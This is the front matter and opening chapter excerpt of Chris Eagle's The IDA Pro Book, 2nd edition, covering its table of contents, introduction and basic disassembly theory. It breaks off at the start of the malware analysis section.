The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler, 2nd Edition (No Starch Press, July 2011, ISBN 1593272898)


Copyright
Dedication
Brief Contents
Contents in Detail
Acknowledgments
Introduction
PART I: Introduction to IDA
PART II: Basic IDA Usage
PART III: Advanced IDA Usage
PART IV: Extending IDA's Capabilities
PART V: Real-World Applications
PART VI: The IDA Debugger
A: Using IDA Freeware 5.0
- Restrictions on IDA Freeware
- Using IDA Freeware
B: IDC/SDK Cross-Reference
Index


THE IDA PRO BOOK

THE UNOFFICIAL GUIDE TO THE WORLD’S MOST POPULAR DISASSEMBLER

CHRIS EAGLE

2ND EDITION

“I wholeheartedly recommend The IDA Pro Book to all IDA Pro users.”

—Ilfak Guilfanov,

creator of IDA Pro

www.nostarch.com

THE FINEST IN GEEK ENTERTAINMENT™

SHELVE IN: PROGRAMMING/SOFTWARE DEVELOPMENT

$69.95 ($79.95 CDN)

IDA PRO DE-OBFUSCATED

No source code? No problem. With IDA Pro, the interactive disassembler, you live in a source code–optional world. IDA can automatically analyze the millions of opcodes that make up an executable and present you with a disassembly. But at that point, your work is just beginning. With The IDA Pro Book, you’ll learn how to turn that mountain of mnemonics into something you can actually use.

Hailed by the creator of IDA Pro as “profound, comprehensive, and accurate,” the second edition of The IDA Pro Book covers everything from the very first steps to advanced automation techniques. You’ll find complete coverage of IDA’s new Qt-based user interface, as well as increased coverage of the IDA debugger, the Bochs debugger, and IDA scripting (especially using IDAPython). But because humans are still smarter than computers, you’ll even learn how to use IDA’s latest interactive and scriptable interfaces to your advantage.

Save time and effort as you learn to:

• Navigate, comment, and modify disassembly
• Identify known library routines, so you can focus your analysis on other areas of the code
• Use code graphing to quickly make sense of cross-references and function calls
• Extend IDA to support new processors and filetypes using the SDK
• Explore popular plug-ins that make writing IDA scripts easier, allow collaborative reverse engineering, and much more
• Use IDA’s built-in debugger to tackle hostile and obfuscated code

Whether you’re analyzing malware, conducting vulnerability research, or reverse engineering software, a mastery of IDA Pro is crucial to your success. Take your skills to the next level with this 2nd edition of The IDA Pro Book.

ABOUT THE AUTHOR

Chris Eagle is a Senior Lecturer of Computer Science at the Naval Postgraduate School in Monterey, CA. He is the author of many IDA plug-ins and co-author of Gray Hat Hacking (McGraw-Hill), and he has spoken at numerous security conferences, including Blackhat, Defcon, Toorcon, and Shmoocon.


“I LIE FLAT.”

This book uses a lay-flat binding that won’t snap shut.


PRAISE FOR THE FIRST EDITION OF THE IDA PRO BOOK

“I wholeheartedly recommend The IDA Pro Book to all IDA Pro users.”

—ILFAK GUILFANOV, CREATOR OF IDA PRO

“A very concise, well laid out book. . . . The step by step examples, and much needed detail of all aspects of IDA alone make this book a good choice.”

—CODY PIERCE, TIPPINGPOINT DVLABS

“Chris Eagle is clearly an excellent educator, as he makes the sometimes very dense and technically involved material easy to read and understand and also chooses his examples well.”

—DINO DAI ZOVI, TRAIL OF BITS BLOG

“Provides a significantly better understanding not of just IDA Pro itself, but of the entire RE process.”

—RYAN LINN, THE ETHICAL HACKER NETWORK

“This book has no fluff or filler, it’s solid information!”

—ERIC HULSE, CARNAL0WNAGE BLOG

“The densest, most accurate, and, by far, the best IDA Pro book ever released.”

—PIERRE VANDEVENNE, OWNER AND CEO OF DATARESCUE SA

“I highly recommend this book to anyone, from the person looking to begin using IDA Pro to the seasoned veteran.”

—DUSTIN D. TRAMMELL, SECURITY RESEARCHER

“This book does definitely get a strong buy recommendation from me. It’s well written and it covers IDA Pro more comprehensively than any other written document I am aware of (including the actual IDA Pro Manual).”

—SEBASTIAN PORST, SENIOR SOFTWARE SECURITY ENGINEER, MICROSOFT

“Whether you need to solve a tough runtime defect or examine your application security from the inside out, IDA Pro is a great tool and this book is THE guide for coming up to speed.”

—JOE STAGNER, PROGRAM MANAGER, MICROSOFT

THE IDA PRO BOOK

2ND EDITION

The Unofficial Guide to the World’s Most Popular Disassembler

by Chris Eagle

San Francisco

mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher.

Printed in Canada

15 14 13 12 11 1 2 3 4 5 6 7 8 9

ISBN-10: 1-59327-289-8

ISBN-13: 978-1-59327-289-0

Publisher: William Pollock

Production Editor: Alison Law

Cover and Interior Design: Octopod Studios

Developmental Editor: Tyler Ortman

Technical Reviewer: Tim Vidas

Copyeditor: Linda Recktenwald

Compositor: Alison Law

Proofreader: Paula L. Fleming

Indexer: BIM Indexing & Proofreading Services

For information on book distributors or translations, please contact No Starch Press, Inc. directly:

No Starch Press, Inc.

38 Ringold Street, San Francisco, CA 94103

phone: 415.863.9900; fax: 415.863.9950; info@nostarch.com; www.nostarch.com

The Library of Congress has cataloged the first edition as follows:

Eagle, Chris.

The IDA Pro book : the unofficial guide to the world's most popular disassembler / Chris Eagle.

p. cm.

Includes bibliographical references and index.

ISBN-13: 978-1-59327-178-7

ISBN-10: 1-59327-178-6

1. IDA Pro (Electronic resource) 2. Disassemblers (Computer programs) 3. Debugging in computer science. I. Title.

QA76.76.D57E245 2008

005.1'4--dc22

2008030632

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark.

The information in this book is distributed on an “As Is” basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it.

This book is dedicated to my mother.

BRIEF CONTENTS

Acknowledgments
Introduction

PART I: INTRODUCTION TO IDA
Chapter 1: Introduction to Disassembly
Chapter 2: Reversing and Disassembly Tools
Chapter 3: IDA Pro Background

PART II: BASIC IDA USAGE
Chapter 4: Getting Started with IDA
Chapter 5: IDA Data Displays
Chapter 6: Disassembly Navigation
Chapter 7: Disassembly Manipulation
Chapter 8: Datatypes and Data Structures
Chapter 9: Cross-References and Graphing
Chapter 10: The Many Faces of IDA

PART III: ADVANCED IDA USAGE
Chapter 11: Customizing IDA
Chapter 12: Library Recognition Using FLIRT Signatures
Chapter 13: Extending IDA’s Knowledge
Chapter 14: Patching Binaries and Other IDA Limitations


PART IV: EXTENDING IDA’S CAPABILITIES
Chapter 15: IDA Scripting
Chapter 16: The IDA Software Development Kit
Chapter 17: The IDA Plug-in Architecture
Chapter 18: Binary Files and IDA Loader Modules
Chapter 19: IDA Processor Modules

PART V: REAL-WORLD APPLICATIONS
Chapter 20: Compiler Personalities
Chapter 21: Obfuscated Code Analysis
Chapter 22: Vulnerability Analysis
Chapter 23: Real-World IDA Plug-ins

PART VI: THE IDA DEBUGGER
Chapter 24: The IDA Debugger
Chapter 25: Disassembler/Debugger Integration
Chapter 26: Additional Debugger Features

Appendix A: Using IDA Freeware 5.0
Appendix B: IDC/SDK Cross-Reference
Index

CONTENTS IN DETAIL

ACKNOWLEDGMENTS

INTRODUCTION

PART I: INTRODUCTION TO IDA

INTRODUCTION TO DISASSEMBLY
Disassembly Theory
The What of Disassembly
The Why of Disassembly
- Malware Analysis
- Vulnerability Analysis
- Software Interoperability
- Compiler Validation
- Debugging Displays
The How of Disassembly
- A Basic Disassembly Algorithm
- Linear Sweep Disassembly
- Recursive Descent Disassembly
Summary

REVERSING AND DISASSEMBLY TOOLS
Classification Tools
- file
- PE Tools
- PEiD
Summary Tools
- nm
- ldd
- objdump
- otool
- dumpbin
- c++filt
Deep Inspection Tools
- strings
- Disassemblers
Summary


IDA PRO BACKGROUND
Hex-Rays’ Stance on Piracy
Obtaining IDA Pro
- IDA Versions
- IDA Licenses
- Purchasing IDA
- Upgrading IDA
IDA Support Resources
Your IDA Installation
- Windows Installation
- OS X and Linux Installation
- IDA and SELinux
- 32-bit vs. 64-bit IDA
- The IDA Directory Layout
Thoughts on IDA’s User Interface
Summary

PART II: BASIC IDA USAGE

GETTING STARTED WITH IDA
Launching IDA
- IDA File Loading
- Using the Binary File Loader
IDA Database Files
- IDA Database Creation
- Closing IDA Databases
- Reopening a Database
Introduction to the IDA Desktop
Desktop Behavior During Initial Analysis
IDA Desktop Tips and Tricks
Reporting Bugs
Summary

IDA DATA DISPLAYS
The Principal IDA Displays
- The Disassembly Window
- The Functions Window
- The Output Window
Secondary IDA Displays
- The Hex View Window
- The Exports Window
- The Imports Window


- The Structures Window
- The Enums Window
Tertiary IDA Displays
- The Strings Window
- The Names Window
- The Segments Window
- The Signatures Window
- The Type Libraries Window
- The Function Calls Window
- The Problems Window
Summary

DISASSEMBLY NAVIGATION
Basic IDA Navigation
- Double-Click Navigation
- Jump to Address
- Navigation History
Stack Frames
- Calling Conventions
- Local Variable Layout
- Stack Frame Examples
- IDA Stack Views
Searching the Database
- Text Searches
- Binary Searches
Summary

DISASSEMBLY MANIPULATION
Names and Naming
- Parameters and Local Variables
- Named Locations
Commenting in IDA
- Regular Comments
- Repeatable Comments
- Anterior and Posterior Lines
- Function Comments
Basic Code Transformations
- Code Display Options
- Formatting Instruction Operands
- Manipulating Functions
- Converting Data to Code (and Vice Versa)
Basic Data Transformations
- Specifying Data Sizes
- Working with Strings
- Specifying Arrays
Summary


DATATYPES AND DATA STRUCTURES
Recognizing Data Structure Use
- Array Member Access
- Structure Member Access
Creating IDA Structures
- Creating a New Structure (or Union)
- Editing Structure Members
- Stack Frames as Specialized Structures
Using Structure Templates
Importing New Structures
- Parsing C Structure Declarations
- Parsing C Header Files
Using Standard Structures
IDA TIL Files
- Loading New TIL Files
- Sharing TIL Files
C++ Reversing Primer
- The this Pointer
- Virtual Functions and Vtables
- The Object Life Cycle
- Name Mangling
- Runtime Type Identification
- Inheritance Relationships
- C++ Reverse Engineering References
Summary

CROSS-REFERENCES AND GRAPHING
Cross-References
- Code Cross-References
- Data Cross-References
- Cross-Reference Lists
- Function Calls
IDA Graphing
- IDA External (Third-Party) Graphing
- IDA’s Integrated Graph View
Summary

THE MANY FACES OF IDA
Console Mode IDA
- Common Features of Console Mode
- Windows Console Specifics
- Linux Console Specifics
- OS X Console Specifics
Using IDA’s Batch Mode
Summary


PART III: ADVANCED IDA USAGE

CUSTOMIZING IDA
Configuration Files
- The Main Configuration File: ida.cfg
- The GUI Configuration File: idagui.cfg
- The Console Configuration File: idatui.cfg
Additional IDA Configuration Options
- IDA Colors
- Customizing IDA Toolbars
Summary

LIBRARY RECOGNITION USING FLIRT SIGNATURES
Fast Library Identification and Recognition Technology
Applying FLIRT Signatures
Creating FLIRT Signature Files
- Signature-Creation Overview
- Identifying and Acquiring Static Libraries
- Creating Pattern Files
- Creating Signature Files
- Startup Signatures
Summary

EXTENDING IDA’S KNOWLEDGE
Augmenting Function Information
- IDS Files
- Creating IDS Files
Augmenting Predefined Comments with loadint
Summary

PATCHING BINARIES AND OTHER IDA LIMITATIONS
The Infamous Patch Program Menu
- Changing Individual Database Bytes
- Changing a Word in the Database
- Using the Assemble Dialog
IDA Output Files and Patch Generation
- IDA-Generated MAP Files
- IDA-Generated ASM Files
- IDA-Generated INC Files
- IDA-Generated LST Files
- IDA-Generated EXE Files


- IDA-Generated DIF Files
- IDA-Generated HTML Files
Summary

PART IV: EXTENDING IDA’S CAPABILITIES

IDA SCRIPTING
Basic Script Execution
The IDC Language
- IDC Variables
- IDC Expressions
- IDC Statements
- IDC Functions
- IDC Objects
- IDC Programs
- Error Handling in IDC
- Persistent Data Storage in IDC
Associating IDC Scripts with Hotkeys
Useful IDC Functions
- Functions for Reading and Modifying Data
- User Interaction Functions
- String-Manipulation Functions
- File Input/Output Functions
- Manipulating Database Names
- Functions Dealing with Functions
- Code Cross-Reference Functions
- Data Cross-Reference Functions
- Database Manipulation Functions
- Database Search Functions

Disassembly Line Components ................................................................... 270

IDC Scripting Examples.......................................................................................... 270

Enumerating Functions .............................................................................. 270

Enumerating Instructions............................................................................ 271

Enumerating Cross-References.................................................................... 272

Enumerating Exported Functions................................................................. 275

Finding and Labeling Function Arguments ................................................... 275

Emulating Assembly Language Behavior ..................................................... 278

IDAPython............................................................................................................ 280

Using IDAPython...................................................................................... 281

IDAPython Scripting Examples ................................................................................ 282

Enumerating Functions .............................................................................. 282

Enumerating Instructions............................................................................ 282

Enumerating Cross-References.................................................................... 283

Enumerating Exported Functions................................................................. 283

Summary.............................................................................................................. 284

THE IDA SOFTWARE DEVELOPMENT KIT 285

SDK Introduction ................................................................................................... 286

SDK Installation........................................................................................ 287

SDK Layout.............................................................................................. 287

Configuring a Build Environment................................................................ 289

The IDA Application Programming Interface ............................................................. 289

Header Files Overview ............................................................................. 290

Netnodes................................................................................................ 294

Useful SDK Datatypes............................................................................... 302

Commonly Used SDK Functions.................................................................. 304

Iteration Techniques Using the IDA API........................................................ 310

Summary.............................................................................................................. 314

THE IDA PLUG-IN ARCHITECTURE 315

Writing a Plug-in................................................................................................... 316

The Plug-in Life Cycle................................................................................ 318

Plug-in Initialization .................................................................................. 320

Event Notification..................................................................................... 321

Plug-in Execution...................................................................................... 322

Building Your Plug-ins ............................................................................................ 324

Installing Plug-ins................................................................................................... 329

Configuring Plug-ins .............................................................................................. 330

Extending IDC ...................................................................................................... 331

Plug-in User Interface Options................................................................................. 333

Using the SDK’s Chooser Dialogs............................................................... 334

Creating Customized Forms with the SDK.................................................... 337

Windows-Only User Interface–Generation Techniques.................................. 341

User Interface Generation with Qt.............................................................. 342

Scripted Plug-ins.................................................................................................... 344

Summary.............................................................................................................. 346

BINARY FILES AND IDA LOADER MODULES 347

Unknown File Analysis........................................................................................... 348

Manually Loading a Windows PE File...................................................................... 349

IDA Loader Modules.............................................................................................. 358

Writing an IDA Loader Using the SDK ..................................................................... 358

The Simpleton Loader ............................................................................... 361

Building an IDA Loader Module................................................................. 366

A pcap Loader for IDA.............................................................................. 366

Alternative Loader Strategies .................................................................................. 372

Writing a Scripted Loader...................................................................................... 373

Summary.............................................................................................................. 375

IDA PROCESSOR MODULES 377

Python Byte Code.................................................................................................. 378

The Python Interpreter............................................................................................ 379

Writing a Processor Module Using the SDK.............................................................. 380

The processor_t Struct............................................................................... 380

Basic Initialization of the LPH Structure........................................................ 381

The Analyzer........................................................................................... 385

The Emulator............................................................................................ 390

The Outputter........................................................................................... 394

Processor Notifications.............................................................................. 399

Other processor_t Members....................................................................... 401

Building Processor Modules.................................................................................... 403

Customizing Existing Processors.............................................................................. 407

Processor Module Architecture................................................................................ 409

Scripting a Processor Module ................................................................................. 411

Summary.............................................................................................................. 412

PART V

REAL-WORLD APPLICATIONS

COMPILER PERSONALITIES 415

Jump Tables and Switch Statements......................................................................... 416

RTTI Implementations ............................................................................................. 420

Locating main....................................................................................................... 421

Debug vs. Release Binaries..................................................................................... 428

Alternative Calling Conventions .............................................................................. 430

Summary.............................................................................................................. 432

OBFUSCATED CODE ANALYSIS 433

Anti–Static Analysis Techniques............................................................................... 434

Disassembly Desynchronization ................................................................. 434

Dynamically Computed Target Addresses.................................................... 437

Imported Function Obfuscation .................................................................. 444

Targeted Attacks on Analysis Tools............................................................. 448

Anti–Dynamic Analysis Techniques.......................................................................... 449

Detecting Virtualization............................................................................. 449

Detecting Instrumentation .......................................................................... 451

Detecting Debuggers ................................................................................ 452

Preventing Debugging .............................................................................. 453

Static De-obfuscation of Binaries Using IDA.............................................................. 454

Script-Oriented De-obfuscation................................................................... 455

Emulation-Oriented De-obfuscation............................................................. 460

Virtual Machine-Based Obfuscation......................................................................... 472

Summary.............................................................................................................. 474

VULNERABILITY ANALYSIS 475

Discovering New Vulnerabilities with IDA................................................................. 476

After-the-Fact Vulnerability Discovery with IDA .......................................................... 483

IDA and the Exploit-Development Process................................................................. 488

Stack Frame Breakdown ........................................................................... 488

Locating Instruction Sequences................................................................... 492

Finding Useful Virtual Addresses ................................................................ 494

Analyzing Shellcode.............................................................................................. 495

Summary.............................................................................................................. 498

REAL-WORLD IDA PLUG-INS 499

Hex-Rays.............................................................................................................. 500

IDAPython............................................................................................................ 503

collabREate .......................................................................................................... 503

ida-x86emu.......................................................................................................... 506

Class Informer....................................................................................................... 506

MyNav................................................................................................................ 508

IdaPdf.................................................................................................................. 509

Summary.............................................................................................................. 510

PART VI

THE IDA DEBUGGER

THE IDA DEBUGGER 513

Launching the Debugger ........................................................................................ 514

Basic Debugger Displays........................................................................................ 518

Process Control..................................................................................................... 521

Breakpoints ............................................................................................. 522

Tracing................................................................................................... 526

Stack Traces............................................................................................ 528

Watches ................................................................................................. 529

Automating Debugger Tasks................................................................................... 530

Scripting Debugger Actions....................................................................... 530

Automating Debugger Actions with IDA Plug-ins........................................... 536

Summary.............................................................................................................. 538

DISASSEMBLER/DEBUGGER INTEGRATION 539

Background.......................................................................................................... 540

IDA Databases and the IDA Debugger..................................................................... 541

Debugging Obfuscated Code................................................................................. 543

Launching the Process............................................................................... 545

Simple Decryption and Decompression Loops.............................................. 546

Import Table Reconstruction....................................................................... 550

Hiding the Debugger................................................................................ 555

IdaStealth............................................................................................................. 560

Dealing with Exceptions......................................................................................... 561

Summary.............................................................................................................. 568

ADDITIONAL DEBUGGER FEATURES 569

Remote Debugging with IDA................................................................................... 569

Using a Hex-Rays Debugging Server .......................................................... 570

Attaching to a Remote Process................................................................... 573

Exception Handling During Remote Debugging............................................ 574

Using Scripts and Plug-ins During Remote Debugging ................................... 574

Debugging with Bochs........................................................................................... 574

Bochs IDB Mode ...................................................................................... 575

Bochs PE Mode........................................................................................ 576

Bochs Disk Image Mode............................................................................ 577

Appcall................................................................................................................ 578

Summary.............................................................................................................. 579

USING IDA FREEWARE 5.0 581

Restrictions on IDA Freeware .................................................................................. 582

Using IDA Freeware .............................................................................................. 583

IDC/SDK CROSS-REFERENCE 585

INDEX 609

ACKNOWLEDGMENTS

As with the first edition, I would like to thank my family for putting up with me while I worked on this project. I am ever grateful for their patience and tolerance.

I would also like to thank everyone who helped make the first edition a success, in particular the readers who I hope have found it to be a useful addition to their reverse engineering libraries. Without your support and many kind words, this edition would never have been possible.

Once again I wish to thank my technical editor Tim Vidas for all of his input over the course of this project, as well as his wife Sheila for allowing me to borrow him a second time.

Thanks also to the developers at Hex-Rays, not only for the product you have built but also for putting up with my “bug” reports, too many of which turned out to be false alarms. Ilfak, you have as usual been more than generous with your time; Elias, Igor, and Daniel, you have all provided insights that I could have obtained nowhere else. Together you all make IDA my favorite piece of software.

Finally, I would like to thank Alison Law and everyone else at No Starch Press for their hard work in keeping this version of the book moving along as smoothly as I could ever have hoped.

INTRODUCTION

Writing a book about IDA Pro is a challenging task. The fact that it is a complex piece of software with more features than can even be mentioned, let alone detailed in a book of reasonable size, is the least of the difficulties. New releases of IDA also tend to occur frequently enough that any book will almost certainly be one, if not two, versions behind by the time it hits the streets. Including version 5.3, which was released just as the first edition was going to press, seven new versions of IDA have been released since the first edition was published. The release of version 6.0 with a new, Qt-based graphical user interface motivated me to update the book and address many of the features that have been introduced in the interim. Of course, true to form, another version of IDA (6.1) was released late in the process just to make things more exciting.

My goal with this edition remains to help others get started with IDA and perhaps develop an interest in reverse engineering in general. For anyone looking to get into the reverse engineering field, I can’t stress enough how important it is that you develop competent programming skills. Ideally, you should love code, perhaps going so far as to eat, sleep, and breathe code. If programming intimidates you, then reverse engineering is probably not for you. It is possible to argue that reverse engineering requires no programming at all because all you are doing is taking apart someone else’s program; however, without committing to developing scripts and plug-ins to help automate your work, you will never become a truly effective reverse engineer. In my case, programming and reverse engineering substitute for the challenge of The New York Times Sunday crossword puzzle, so it is rarely tedious.

For continuity purposes, this edition preserves the overall structure of the first edition while elaborating and adding material where appropriate. There are a number of ways to read this book. Users with little reverse engineering background may wish to begin with Chapters 1 and 2 for some background information on reverse engineering and disassemblers. Users without much IDA experience who are looking to dive right in can begin with Chapter 3, which discusses the basic layout of an IDA installation, while Chapter 4 covers what goes on when you launch IDA and load a file for analysis. Chapters 5 through 7 discuss IDA’s user interface features and basic capabilities.

Readers possessing some familiarity with IDA may wish to begin with Chapter 8, which discusses how to use IDA to deal with complex data structures, including C++ classes. Chapter 9, in turn, covers IDA cross-references, which are the foundation for IDA’s graph-based displays (also covered in Chapter 9). Chapter 10 provides a bit of a diversion useful for readers interested in running IDA on non-Windows platforms (Linux or OS X).

More advanced IDA users may find Chapters 11 through 14 a good place to start, because they cover some of the fringe uses of IDA and its companion tools. A brief run-through of some of IDA’s configuration options is presented in Chapter 11. Chapter 12 covers IDA’s FLIRT/FLAIR technology and related tools that are used to develop and utilize signatures to distinguish library code from application code. Chapter 13 offers some insight into IDA type libraries and ways to extend them, while Chapter 14 addresses the much-asked question of whether IDA can be used to patch binary files.

IDA is a quite capable tool right out of the box; however, one of its greatest strengths is its extensibility, which users have taken advantage of to make IDA do some very interesting things over the years. IDA’s extensibility features are covered in Chapters 15 through 19, which begin with coverage of IDA’s scripting features, including increased coverage of IDAPython, and follow with a systematic walk through IDA’s programming API, as provided by its software development kit (SDK). Chapter 16 provides an overview of the SDK, while Chapters 17 through 19 walk you through plug-ins, file loaders, and processor modules.

With the bulk of IDA’s capabilities covered, Chapters 20 through 23 turn to more practical uses of IDA for reverse engineering by examining how compilers differ (Chapter 20); how IDA may be used to analyze obfuscated code, as is often encountered when analyzing malware (Chapter 21); and how IDA may be used in the vulnerability discovery and analysis process (Chapter 22). Chapter 23 concludes the section by presenting some useful IDA extensions (plug-ins) that have been published over the years.

The book concludes with expanded coverage of IDA’s built-in debugger in Chapters 24 through 26. Chapter 24 begins by introducing the basic features of the debugger. Chapter 25 discusses some of the challenges of using the debugger to examine obfuscated code, including the challenge of dealing with any anti-debugging feature that may be present. Chapter 26 concludes the book with a discussion of IDA’s remote debugging capabilities and the use of the Bochs emulator as an integrated debugging platform.

At the time of this writing, IDA version 6.1 was the most current version available, and the book is written largely from a 6.1 perspective. Hex-Rays is generous enough to make an older version of IDA available for free; the freeware version of IDA is a reduced-functionality version of IDA 5.0. While many of the IDA features discussed in the book apply to the freeware version as well, Appendix A provides a brief rundown of some of the differences a user of the freeware version can expect to encounter.

Finally, since it is a somewhat natural progression to begin with IDA scripting and move on to creating compiled plug-ins, Appendix B provides a complete mapping of every IDC function to its corresponding SDK counterparts. In some cases you will find a one-to-one correspondence between an IDC function and an SDK function (though in all cases the names of those functions are different); in other cases, you will find that several SDK function calls are required to implement a single IDC function. The intent of Appendix B is to answer questions along the lines of “I know how to do X in IDC, how can I do X with a plug-in?” The information in Appendix B was obtained by reverse engineering the IDA kernel, which is perfectly legal under IDA’s atypical licensing agreement.

Throughout the book, I have tried to avoid long sequences of code in favor of short sequences that demonstrate specific points. The vast majority of sample code, along with many of the binary files used to generate examples, is available on the book’s official website, http://www.idabook.com/, where you will also find additional examples not included in the book as well as a comprehensive list of references used throughout the book (such as live links to all URLs referred to in footnotes).

PART I

INTRODUCTION TO IDA

INTRODUCTION TO DISASSEMBLY

You may be wondering what to expect in a book dedicated to IDA Pro. While obviously IDA-centric, this book is not intended to come across as The IDA Pro User’s Manual. Instead, we intend to use IDA as the enabling tool for discussing reverse engineering techniques that you will find useful in analyzing a wide variety of software, ranging from vulnerable applications to malware. When appropriate, we will provide detailed steps to be followed in IDA for performing specific actions related to the task at hand. As a result we will take a rather roundabout walk through IDA’s capabilities, beginning with the basic tasks you will want to perform upon initial examination of a file and leading up to advanced uses and customization of IDA for more challenging reverse engineering problems. We make no attempt to cover all of IDA’s features. We do, however, cover the features that you will find most useful in meeting your reverse engineering challenges. This book will help make IDA the most potent weapon in your arsenal of tools.

4Chapter 1

Prior to diving into any IDA specifics, it will be useful to cover some of the basics of the disassembly process as well as review some other tools available for reverse engineering of compiled code. While none of these tools offers the complete range of IDA’s capabilities, each does address specific subsets of IDA functionality and offer valuable insight into specific IDA features. The remainder of this chapter is dedicated to understanding the disassembly process.

Disassembly Theory

Anyone who has spent any time at all studying programming languages has probably learned about the various generations of languages, but they are summarized here for those who may have been sleeping.

First-generation languages

These are the lowest form of language, generally consisting of ones and zeros or some shorthand form such as hexadecimal, and readable only by binary ninjas. Things are confusing at this level because it is often difficult to distinguish data from instructions since everything looks pretty much the same. First-generation languages may also be referred to as machine languages, and in some cases byte code, while machine language programs are often referred to as binaries.

Second-generation languages

Also called assembly languages, second-generation languages are a mere table lookup away from machine language and generally map specific bit patterns, or operation codes (opcodes), to short but memorable character sequences called mnemonics. Occasionally these mnemonics actually help programmers remember the instructions with which they are associated. An assembler is a tool used by programmers to translate their assembly language programs into machine language suitable for execution.

Third-generation languages

These languages take another step toward the expressive capability of natural languages by introducing keywords and constructs that programmers use as the building blocks for their programs. Third-generation languages are generally platform independent, though programs written using them may be platform dependent as a result of using features unique to a specific operating system. Often-cited examples include FORTRAN, COBOL, C, and Java. Programmers generally use compilers to translate their programs into assembly language or all the way to machine language (or some rough equivalent such as byte code).

Fourth-generation languages

These exist but aren’t relevant to this book and will not be discussed.
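The "table lookup" relationship between assembly language and machine language described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the names OPCODES and assemble are hypothetical, and the table covers just a handful of one-byte, operand-free 32-bit x86 instructions, whereas a real assembler must also encode operands, prefixes, and addressing modes.

```python
# Toy assembler: each mnemonic maps to a single opcode byte (32-bit x86).
# OPCODES and assemble() are illustrative names, not part of any real tool.
OPCODES = {
    "push ebp": 0x55,
    "pop ebp": 0x5D,
    "nop": 0x90,
    "leave": 0xC9,
    "ret": 0xC3,
    "int3": 0xCC,
}

def assemble(lines):
    """Translate a list of mnemonics into machine code by table lookup."""
    return bytes(OPCODES[line.strip().lower()] for line in lines)

machine_code = assemble(["push ebp", "nop", "pop ebp", "ret"])
print(machine_code.hex())  # 55905dc3
```

The four bytes printed at the end are the first-generation form of the same program: nothing in them indicates where one instruction ends and the next begins, or whether they are instructions at all.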

The What of Disassembly

In a traditional software development model, compilers, assemblers, and linkers are used by themselves or in combination to create executable programs. In order to work our way backwards (or reverse engineer programs), we use tools to undo the assembly and compilation processes. Not surprisingly, such tools are called disassemblers and decompilers, and they do pretty much what their names imply. A disassembler undoes the assembly process, so we should expect assembly language as the output (and therefore machine language as input). Decompilers aim to produce output in a high-level language when given assembly or even machine language as input.
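To make the input and output of a disassembler concrete, here is a minimal sketch that takes machine language bytes and produces assembly language text. It is a toy under stated assumptions, not how IDA works internally: the DECODE table and the disassemble function are hypothetical names, only five 32-bit x86 opcodes are recognized, and bytes are decoded strictly one after another from offset 0.

```python
import struct

# opcode byte -> (mnemonic template, number of immediate bytes that follow)
# DECODE and disassemble() are illustrative names for this sketch only.
DECODE = {
    0x55: ("push ebp", 0),
    0x5D: ("pop ebp", 0),
    0x90: ("nop", 0),
    0xC3: ("ret", 0),
    0xB8: ("mov eax, 0x{:x}", 4),  # B8 followed by a 32-bit immediate
}

def disassemble(code):
    """Return a list of (offset, text) pairs for the given machine code."""
    listing = []
    offset = 0
    while offset < len(code):
        opcode = code[offset]
        entry = DECODE.get(opcode)
        # Unknown opcode or truncated operand: emit the byte as raw data.
        if entry is None or offset + 1 + entry[1] > len(code):
            listing.append((offset, "db 0x{:02x}".format(opcode)))
            offset += 1
            continue
        template, imm_len = entry
        if imm_len:
            (imm,) = struct.unpack_from("<I", code, offset + 1)
            listing.append((offset, template.format(imm)))
        else:
            listing.append((offset, template))
        offset += 1 + imm_len
    return listing

for offset, text in disassemble(bytes.fromhex("55b82a0000005dc3")):
    print("{:04x}  {}".format(offset, text))
```

Even this toy has to know how long each instruction is before it can find the start of the next one, which is why a single wrong decoding decision can throw off everything that follows it.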

The promise of “source code recovery” will always be attractive in a competitive software market, and thus the development of usable decompilers remains an active research area in computer science. The following are just a few of the reasons that decompilation is difficult:

The compilation process is lossy.

At the machine language level there are no variable or function names, and variable type information can be determined only by how the data is used rather than explicit type declarations. When you observe 32 bits of data being transferred, you’ll need to do some investigative work to determine whether those 32 bits represent an integer, a 32-bit floating point value, or a 32-bit pointer.

Compilation is a many-to-many operation.

This means that a source program can be translated to assembly language in many different ways, and machine language can be translated back to source in many different ways. As a result, it is quite common that compiling a file and immediately decompiling it may yield a vastly different source file from the one that was input.

Decompilers are very language and library dependent.

Processing a binary produced by a Delphi compiler with a decompiler designed to generate C code can yield very strange results. Similarly, feeding a compiled Windows binary through a decompiler that has no knowledge of the Windows programming API may not yield anything useful.

A nearly perfect disassembly capability is needed in order to accurately

decompile a binary.

Any errors or omissions in the disassembly phase will almost certainly

propagate through to the decompiled code.
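The first reason above, that type information is lost during compilation, can be illustrated with a minimal Python sketch. The function name `interpret_dword` and the sample bytes are assumptions made for illustration; the point is only that the same four bytes have several equally valid readings until the surrounding code reveals how they are used.

```python
import struct

def interpret_dword(raw: bytes) -> dict:
    """Return three plausible readings of the same four little-endian bytes."""
    if len(raw) != 4:
        raise ValueError("expected exactly 4 bytes")
    (as_int,) = struct.unpack("<i", raw)     # signed 32-bit integer
    (as_float,) = struct.unpack("<f", raw)   # IEEE 754 single-precision float
    (as_ptr,) = struct.unpack("<I", raw)     # unsigned value, e.g. an address
    return {"int": as_int, "float": as_float, "pointer": f"0x{as_ptr:08x}"}

# Hypothetical sample: the bytes 00 00 80 3F as they might appear in memory.
print(interpret_dword(bytes.fromhex("0000803f")))
```

Nothing in the bytes themselves says which reading is correct; a disassembler or decompiler has to infer it from the instructions that consume the value.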

Hex-Rays, the most sophisticated decompiler on the market today, will

be reviewed in Chapter 23.

The Why of Disassembly

The purpose of disassembly tools is often to facilitate understanding of pro-

grams when source code is unavailable. Common situations in which disas-

sembly is used include these:

• Analysis of malware

• Analysis of closed-source software for vulnerabilities

• Analysis of closed-source software for interoperability

• Analysis of compiler-generated code to validate compiler performance/correctness

• Display of program instructions while debugging

The subsequent sections will explain each situation in more detail.

Malware Analysis

Unless you are dealing with a script-based worm, malware authors seldom do

you the favor of providing the source code to their creations. Lacking source

code, you are faced with a very limited set of options for discovering exactly

